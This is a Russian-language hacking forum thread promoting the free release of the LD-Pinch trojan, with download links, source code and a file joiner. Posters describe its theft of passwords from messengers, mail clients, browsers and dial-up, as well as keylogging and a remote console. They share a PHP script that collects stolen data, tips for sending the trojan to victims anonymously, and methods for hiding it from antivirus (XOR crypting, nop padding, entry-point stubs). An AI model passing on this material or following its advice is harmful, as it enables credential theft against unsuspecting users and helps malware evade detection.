Pinch: лучший трой, теперь для всех!

[coban2k]

Платный трой LD-Pinch, теперь раздается даром с конфигуратором и исходниками (а это более 150 кб чистого асма).

Посмотреть скриншоты, а также скачать сам трой можно здесь:
http://www.cobans.net/pinch.html

Напомню возможности троя, увод паролей:
- ICQ99b-2003a/2003b/Lite
- Miranda-icq
- Trillian ICQ&AIM
- &RQ
- The Bat!/The Bat!2 (mailer)
- Outlook/Outlook Express (pop3/imap)
- IE autocomplete & protected sites & ftp (9x/Me/2k/xp supported)
- FAR Manager (ftp)
- Win/Total Commander (ftp)
- RAS (поддерживается 9x/Me/2k/xp)
- System info: OS, memory, CPU, hard drives, logged user, host name, IP
- Key-log
- Remote console
- Посылка e-mail писем используя встроенный SMTP клиент
- Обход firewall'а
- Шифровка писем
- Самоудаление (optional)
- Отчеты в HTML/Text форматах
- Размер файла меньше 10кб
- Модульная система, при компиляции можно отключить некоторые модули, уменьшив тем самым размер выходного файла.

Наслаждайтесь релизом :)

В дополнению к пинчу: MicroJoiner -- клей для файлов, пока ничем не определяется, размер конфигуратора 7 кб, загрузчика 1024 байта (именно столько добавиться при склеивании файлов), цепляет иконки, может клеить картинки, pdf'ы, wav'ы и тд :)
http://www.cobans.net/joiner.html

[coban2k]

Цитата:

пасибо. а каковы причины? вроде кое кто у тебя покупал за денхи.

в последнее время трой почти не брали, свои деньги я получил, спасибо тем кто морально и материально позволил довести пинч до ума

Цитата:

и ещё ворпрос такой нам чё теперь всем пересаживаться на мозиллу

это дело каждого, советую закрыть IE в фаере, т.к. именно через него сейчас происходит больше всего атак на обычных пользователей (посредством дыр)

Цитата:

Жалко тока что от dial-up' a не шлет

отсылает, но не на 100%, там нужно доработать только часть расшифровки в дельфе, сам трой высылает инфу правильную но т.к. формат буффера в котором содержится пасс от RAS'а пока неясен, то вытянуть пароль оттуда можно невсегда.

Цитата:

так этот трой тока на мэйл мона посылать?? а если через аську хочу???

Слишком большие сообщения, можно слать на мыло, веб или скидывать в файл.

Цитата:

coban2k, я чёт не монял с вэбом...как он туда скинет без паса к руту? или чёт я ваще не о том....объясните..

Передается шифрованный текст через POST параметры, используя спрятанное окно IE.

Цитата:

действительно катастрофически не хватает кражи Dial-up из win2000/XP :-(

кому не лень присылайте шифрованные письма на coban2k@mail.ru где не находит dialup и я исправлю, пароль в любом случае там хранится.

Цитата:

У меня в системе стоят (и работают) вде миранды - пинч с одной пароль послал - а другую не заметил... к чему бы это... Я ставил сначала одну миранду, позже поставил другую, но в другую директорию. С новой пароль отправился....

миранда путь прописывает в реестре который я и читаю, если несколько миранд то путь будет только от одной из них :) имхо, нецивильно сканить весь винчестр на наличие дат-файлов.

Цитата:

вроде не ставил галочку самоудаления, а вот только по оддному репорту пришло...

если не поставил галочку Act as Trojan то больше ничего не прийдет, также одинаковые пассы не высылаются (проверка после каждой перезагрузки компа).

Цитата:

Антивири и антирояны его не видят - а вручную как? Где он себя прописывает?

1. Автозапуск:
HKEY_CURRENT_USER\Software\Mic rosoft\Windows\CurrentVersion\ Run <putil>

2. Тут инфа проверки на повторную отсылку пассов (если снести будет посылать все заново):
HKEY_CURRENT_USER\Software\Int el <Data>

3. Сам exe-шник:
Папка виндов\Название троя.exe

4. Файлы кейлога:
Папка виндов\plog

Цитата:

тока бы пару фкункций приделать

исходники в твоем распоряжении, приделывай все что хочешь :)

Цитата:

А мне всётаки не понятно,почему запустив трояна через DCOM дыру приходят тока системная инфа и фсё

DCOM получает левые права, поэтому многие части реестра которые требуются пинчу недоступны, и как следствие пассы не находятся :)

Цитата:

как иконку поменять у этого трояна?

похоже я где-то пути не исправил, потому как иконка компиляется только у меня :)
Попробуйте распаковать трой в папку C:\Program Files\Borland\Delphi6\Projects \Pinch\

Цитата:

dOink, i chemu ti radueshsya?
coban vipustit novuu versiu!!!
TO COBAN: kak sdelat chtobi pincha ne lovil AVP?

Бесплатных версий больше не будет, кому интересно пусть доделывает сам %)

P.S. для седя я уже давно шифранул экзешник, так что его никакой антивирь не видит.

Цитата:

обьясни пожалуйста подробно как сделать чтоб он слал через HTTP
Тут кроме меня на форуме вроде еще кто-то интересовался

Выбираешь протокол HTTP (снизу), потом в поле URL (закладка HTTP) пишешь полный линк к view.php на своем сайте (вроде www.aaa.com/f/view.php), прописываешь в закладке SMTP свое мыло, жмешь кнопку compile и тестируешь. Имей в виду что пинч дважды одни и теже пароли не высылает, если тестируешь меняй свой пасс на асе или мыле и тестируй снова.

Цитата:

Народ, как вообще этого троя отправить? если например продвинутый с точки зрения безопасности компа и никакой ехе.шник, пришедший по почте, ни в жисть не откроет?
Но даже если я его отшлю, и даже если не со своего ящика, то все равно есть проблема: у меня выделенка, => ip у меня статичный.. в аське его видно, а я не хочу, чтобы чел узнал, от кого трой.. Как поступить?

В оперу заходишь, настройки->сеть->прокси серверы.
вводишь проксю, и заходишь на mail.ru
шлешь письмо, прикрепляешь троян и шлешь :)

или качаешь SocksCap, запускаешь Outlook и шлешь через socks5

Цитата:

как иконку поменять у этого трояна?

Используй Microangelo98 или

Sources\PinchBuilder\Main.Pas отрываете:
ищете строчку с коментом // RSRC.RC
далее идет: S := '// Auto-gen и т.д.
удаляете все до знака ;
и пишете:



code:--------------------------------------------------------------------------------
S := '// Auto-generated file, can be deleted...'#13#10#13#10 +
'MAINICON ICON "' + IconPathEdit.Text + '"'#13#10;
--------------------------------------------------------------------------------

и все :)
потом компиляете билдер и все :)
для тех у кого нету делфей - юзайте Resrorator и прочие тулзы, и создаете ресурс с именем MAINICON (тип значок) и запихиваете свой значок.

Цитата:

вопрос по HTTP
что должно быть в view.php ?
что делать если сервер (бесплатный хостинг) не поддерживает SMTP?
и, наконец идея:
можно ли сделать так, чтобы трой отправлял инфу скрипту через QUERY_STRING а тот в свою очередь эту QUERY_STRING писал бы в файл на сервер?

все можно главное чтобы руки некривые были :)
<?
list($to,$subj,$body) = array($_POST['a'],$_POST['b'],$_POST['c']);
if ($f = fsockopen("mx3.mail.ru",25)) {
$msg = 'HELO adm@root.com\n'.
'MAIL FROM:<pinch@pinch.ru>\n'.
'RCPT TO:<$to>\n'.
'DATA\n'.
'$body\n.'.
'quit\n\n';
fputs($f,$msg);
}
fclose($f);
/* запись в файл */
$f = fopen('log.txt','a');
fputs($f,'$data\n--------------------------------------------\n');
fclose($f);
?>

<!-- REQUIRED -->
<script language="JavaScript">
window.status = "_ret_ok_1";
</script></body></html>

Цитата:

подскажите как расшифровать письмо присаное от Pinch

Вместе с пинчем идет программа Parser.exe
Копируешь текст письма и вставляешь туда. Или прямо в пинч билдере(закладка decrypt).

[coban2k]

Еще, народ, настраивайте трой внимательнее, а то ко мне постоянно приходят то тесты то пароли ваши %)

[Archie]

http://zuluhotel.ru/pinch.zip
с ихсодниками. удалять пока не буду.

[diov]

"Ну че, дети, как там в интернете?
В чатах сидите? Гадите в сети?"

Наконец-то наступил первый день весны - 1 марта! Зима потихоньку отступает…
У Феликса сегодня ДР. Ты его, скорее всего, не знаешь, но могу поручиться, что веселый человек, очень хороший и надежный друг. На него можно положиться. С днюхой, Феликс!
В связи с тем, что в этот день столько всего хорошего, то сделаю этот день еще на капельку лучше. Ты можешь скачать шифровщик для пинча. Шифровальщик действует очень примитивно - просто часть кода XOR-ится определенным байтом. Аверы, конечно вскоре просекут эту фишку, но ты можешь поменять байт зашифровки. Как? Почитай readme - я его не просто так писал. Сам шифровщик написан с помощью RadAsm и masm32(куды без него?). Пароль на архив "asechka[dot]ru"
Исходники могу выслать. Для этого пошли мне запрос на мыло antiavp[am]mail[dot]ru.



Наверно, напоследок скажу: не стоит ничего делать просто так. Во всем должен быть смысл. Если бы не ДР - хрен бы я писал этот криптер :) Так что не ломайте ничего только для того, что бы сломать.

"Ладно, надоело, я кончаю, ребятки
Я надеюсь, детки, что у вас все в порядке..."
(c) кирпичи.

[diov]

Проверено AVP - вирусов нет!

[net]

Цитата:

Первоначальное сообщение от ZLOST
Ineon, все можно главное чтобы руки некривые были :)
<?
list($to,$subj,$body) = array($_POST['a'],$_POST['b'],$_POST['c']);
if ($f = fsockopen("mx3.mail.ru",25)) {
$msg = 'HELO adm@root.com\n'.
'MAIL FROM:<pinch@pinch.ru>\n'.
'RCPT TO:<$to>\n'.
'DATA\n'.
'$body\n.'.
'quit\n\n';
fputs($f,$msg);
}
fclose($f);
/* запись в файл */
$f = fopen('log.txt','a');
fputs($f,'$data\n--------------------------------------------\n');
fclose($f);
?>

<!-- REQUIRED -->
<script language="JavaScript">
window.status = "_ret_ok_1";
</script></body></html>

Не работает в текстовый документ сохраняет строку
$data\n--------------------------------------------\n и все? Где ж ошибка? Подскажите плиз

[diov]

Попробуй вместо $data написать $body.

Хостинг h11.ru поддерживает запись в файл, так что можно легко размещать этот скрипт там. На мыло пароли слаться не будут - у них баннеры...

[Ice Cube]

Что то последние время не могу даже тестовое сообщение послатьб пишет can't connect to the server или mailbox name not allowed пробывал со многих серверов и ящиков.

[net]

Цитата:

Первоначальное сообщение от diov
Проверено AVP - вирусов нет!

забавно ;)

[Archie]

Цитата:

Первоначальное сообщение от zK0rN
забавно ;)

Дружище... там есть сырцы, бери, компиль...
Я посмотрю на тебя, когда твоя же Панда снова ругнётся на твой же скомпиленный екзешник Парсера допустим.
Все антивирусы кричат на серверные программы троянов etc.

[FurA]

а где мне можно найти документацию полную на русском языке??
а то был на сайте многоуважаемого coban`a, скачал трой, и ни ухом не рылом не пойму, что с ним делать!

[Mister]

FurA,
Вот ты кадр, тут описаны все, ну или почти все функции трояна, прочитай внимательно.

[net]

народ подскажите луче как перевести процедуры вытаскивания паролей из ассемблера в делфу ...в Pinch всё как то хитро сделано ???

[Keyptor]

DDFit, есть раздел по программированию...

[net]

Трой хороший жаль антивирь ловит !

[Igorek]

А чтобы создать сам файл, который надо отправить жертве, достаточно создать его PinchBuild'erom?

[Aljoxa]

Igorek,

Цитата:

А чтобы создать сам файл, который надо отправить жертве, достаточно создать его PinchBuild'erom?

..ДА

[ven000m]

никто не чего не прикрывал, трафик там копеечный
посмотрим, будет кто-нибудь эту тему покупать, если можно бесплатно залить на хостинг к какому-нибудь другу и пользоваться

[net]

Я слышал вроде как должна вторая версия появиться ?
и кода она ожидатся?

[coban2k]

~vo0D0o~, по некоторым веским причинам разработка пинча-2 была отложена на неопределенное время, доступны исходники реализованной части на http://pinch.ccteam.ru
В ближайшее время будет апгрейд парсера (для P2) (добавятся некоторые опции и возможности фильтрации/экспорта), до продолжения работы над сервером и конфигуратором руки дойдут очень нескоро, если вообще когда-то дойдут.

[Keyptor]

всеравно респект... =)
Проэкт то всеравно развивается - хоть и не так быстро как хотелось другим =)

[net]

Цитата:

по некоторым веским причинам разработка пинча-2 была отложена на неопределенное время

ничё сами доделали

[shine]

Цитата:

Первоначальное сообщение от Alksoft
У меня что-то УРЛ не открывается :(

http://www.wmbuy.ru/Pinch.rar

[LuiCifer]

У меня AVP определяет его как вирус. Че надо сделать(если возиожно) чтоб он не определял его как вирус?

LuiCifer добавил [date]1097312066[/date]:

Да и возможно ли его прикрепить к другим файлам?

[Disabled]

Это, тама ссылка сдохла на первой странице :(
coban2k, можешь где нить выложить?

[Crv_]

Nuphonik, см. пост #27

[[sER]]

Nuphonik,LuiCifer and other
этой теме уже год. надо смотреть дату постов. Уже выходили и понч про, и пинч 2, и другие моды, были кучи топиков на других сайтах как прятать и модифицировать трой. Были написаны кучи прог, но из за крыс которые стучат в супорты каспера и веба все их быстро прикрывают. Складывается пакая ситуация , что в скором времени вообще люди пишущие софт подобной тематики перестанут что-либо выкладывть(некоторые уде так и делают). И я их пойму, так как они тратят своё время и силы, а из-за крыс на форумах и не только всё прикрывают.
з.ы.: Знаю способ как зашарить пинч, но выклдывать не буду. Кто ищет, тот всегда найдёт!

[LuiCifer]

Спасибо что все разъяснил :)
ЗЫ: будем искать...

[Nucleo]

Ни у кого нет чистяка?

[Mega_GnoM]

у меня был , но уже палится как 5 дней... :(

[Nucleo]

Mega_GnoM, отошли плиз на menalrein at mail dot ru.
подойдет.

[fearless]

[sER],
научи прятать =)

[net]

nop ставь.......

[fearless]

БУМЕР,
про ведь тоже палится...

[Crv_]

fearless, что ПРО? Версия пинча? Бумер говорит про "nop", это такой "оператор" в ассемблере, который ничего не делает, опкод которого равер 90h. Нужно просто вставить его в "нужное" (пустое) место в exe'шнике. Чем, как и куда, объяснять не буду, про ЭТО написано уже достаточно статей, пойщи просто ;)
P.s А разве простой nop обманывает, допустим, Каспера? Например, дописывание в конец секции кода (в пустое место, если оно там есть) кода, типа
mov eax, REAL_EP_ADDRESS
jmp eax
легко палится тем же Каспером... (ну, естественно, EP перенесён на этот код :))

[fearless]

Crv_,
загон =)

[coban2k]

Цитата:

который ничего не делает, опкод которого равер 90h.

На самом деле nop кое-что делает, nop = mov ax, ax (90h)

nop'ы можно вставлять как мусор, т.к. каспер определяет вирус/не вирус по нескольким кускам в .exe -- сигнатурам, если места этих кусков изменятся, либо сами куски не совпадут с контрольными суммами каспера, тогда получится чистяк =)

[Crv_]

Цитата:

Первоначальное сообщение от coban2k
На самом деле nop кое-что делает, nop = mov ax, ax (90h)

Хм. Не знал. Просто где бы не прочитал про nop, везде пишут, что мол "ничего не делает". Кстати, а где написано, что делается mov ax, ax??? Или это выведено экспериментальным путём? (у Юрова написано, что есдинственное, что делает nop - это увеличение регистра EIP)

Цитата:

Первоначальное сообщение от coban2k
nop'ы можно вставлять как мусор, т.к. каспер определяет вирус/не вирус по нескольким кускам в .exe -- сигнатурам, если места этих кусков изменятся, либо сами куски не совпадут с контрольными суммами каспера, тогда получится чистяк =)

Как ни пробовал "намусорить" nop'ами, всё не получалось ... Может, не так пробовал? :) А вот сделать тоже самое, вот таким "классическим" кодом - пожалуйста (с переносом EP на этот "кусок"):

prefetcht0 ; OF 18 h
mov eax, OEP
jmp eax

В принципе, можно вместо prefetcht'а использовать некоторые (все, конечно, не пробовал :)) другие операторы сопроцессора. Но да вот беда, они могут не поддерживаться на некоторых старых процессорах...

Вобщем, придумать можно много всего, главное, чтобы места хватило (00 байтов)...

Цитата:

Первоначальное сообщение от fearless
Crv_,
загон =)

В смысле?

[Nucleo]

Не подскажите места куда nop вставлять?